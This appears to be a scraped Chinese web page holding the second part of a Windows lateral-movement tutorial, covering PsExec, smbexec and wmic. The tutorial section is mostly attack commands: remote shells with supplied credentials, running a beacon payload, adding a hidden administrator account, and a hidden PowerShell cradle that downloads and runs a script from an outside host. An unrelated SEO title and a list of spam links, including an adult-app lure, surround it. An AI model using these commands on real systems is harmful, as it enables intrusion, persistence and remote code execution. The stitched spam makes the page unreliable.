当前位置: 首页 > wzjs >正文

建网站英语排名优化外包公司

建网站英语,排名优化外包公司,网络营销试题,网站开发流程进度规划横向移动(下) 其他横向工具介绍 横向移动还有很多其他方法和工具,接下来再为大家介绍一些工具及其用法 Psexec工具横向移动 psexec是windows下非常好的一款远程命令行工具,他是微软提供的pstools命令中的一个,psexec的使用不需要对方主机开启…

横向移动(下)

其他横向工具介绍

横向移动还有很多其他方法和工具,接下来再为大家介绍一些工具及其用法

Psexec工具横向移动

psexec是windows下非常好的一款远程命令行工具,他是微软提供的pstools命令中的一个,psexec的使用不需要对方主机开启3389端口,只需要对方开启admin$ 共享和IPC共享和IPC共享和IPC(该共享默认开启,依赖于445端口),就是要开启445和135端口,如果没有开启,psexec也是不能使用的

工具下载地址:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

image-20250716220215785

Psexec工具使用:

psexec \\ip -u administrator -p admin cmd 进入半交互式shell
psexec -accepteula \\ip -s cmd.exe 建立交互的shell
psexec \\ip -u administrator -p admin -w c:\ cmd 进入交互式shell,且c:\\是目标机器的工作目录
psexec \\ip -u administrator -p admin whoami all 执行命令
psexec \\ip -u administrator -p admin -d c:\beacon.exe 执行文件
psexec \\ip -u administrator -p admin -h -d c:\beacon.exe UAC的用户权限执行文件

更多使用方法:https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexec

SMB工具横向移动

smbexec.exe 用户名:密码@ip

image-20250630213506835

SMBEXEC工作原理:

1、建立IPC$连接

2、通过服务执行命令

3、将命令放在%temp%/execute.bat中

4、运行execute.bat文件,将结果存储在C:/_output文件中

5、删除execute.bat

通过客户端读取目标机器的C:/_output文件中的内容

%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\_output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.batecho whoami

WMI横向移动命令(135端口)

WIMI是Windows在Powershell还没发布前,微软用来管理Windows系统的重要的数据库工具,他本身的组织架构是一个数据库架构,WMI服务使用DCOM或WinRM协议,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中

wmic /?
1、执行命令并且输出
wmic /node:IP地址 /user:本地用户管理员/域管理员 /password:密码 process call create "cmd.exe /c ipconfig >c:\ip.txt"
2、列出远程主机进程
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process list brief
3、在远程系统上执行bat脚本
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process call create c:\programdata\test.bat
4、添加用户
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process call create "cmd.exe /c net user test1!@123QWE /add && net localgroup administrator test1 /add"
5、执行Powershell上线
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient),downloadstring('ps脚本地址'))\""
wmic /node:192.168.41.218 /user:administrator /password:Admin@123 PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://www.xxx.com/uiodsahfbkjds'))\""
http://www.dtcms.com/wzjs/395143.html

相关文章:

  • 珠海哪里做网站的国外b站浏览器
  • 如何给网站绑定域名河南今日头条新闻
  • 用代码怎么做网站18款禁用软件黄app免费
  • 做三合一网站的好处幽默软文广告经典案例
  • 福州市建设局网站 动态优化设计七年级下册语文答案
  • 网站制作有哪些技术百度一下下载安装
  • 个人做医疗类网站违法?网络营销课程学什么
  • 网站建设xm37怎么找拉新推广平台
  • 做签证网站产品宣传推广方式有哪些
  • 中国住房城乡建设部官方网站seo资料站
  • 亚马逊云服务 网站建设网络营销平台都有哪些
  • 提升学历的机构seo查询 站长之家
  • 上海网站设计费用论坛企业推广
  • 做商铺最好的网站外贸网站建设优化
  • wordpress 自动webp百度seo优化分析
  • 东莞建设小学网站网站推广建设
  • html做网站需要服务器吗营销软件代理推广
  • 邢台地区网站建设有创意的网络广告案例
  • 餐饮美食网站模板源码河北seo推广公司
  • 大庆做网站比较好的公司企业网站建设的重要性
  • 企业网页模板图片seo具体是什么
  • 专门做面条菜谱的网站整合营销策略有哪些
  • 吉林省建设厅证件查询网站百度邮箱登录入口
  • 保姆给老人做爰神马网站seo教程搜索引擎优化入门与进阶
  • 象山网站优化公司山东工艺美术学院网站建设公司
  • 网站制作策划建设大纲网页seo优化
  • wordpress linux 建站教程如何自己做推广
  • 做外贸都有哪些网站石狮seo
  • 我做的网站服务器别人没法左键点击下载呢对网络营销的理解
  • 做试管婴儿的网站自己可以创建网站吗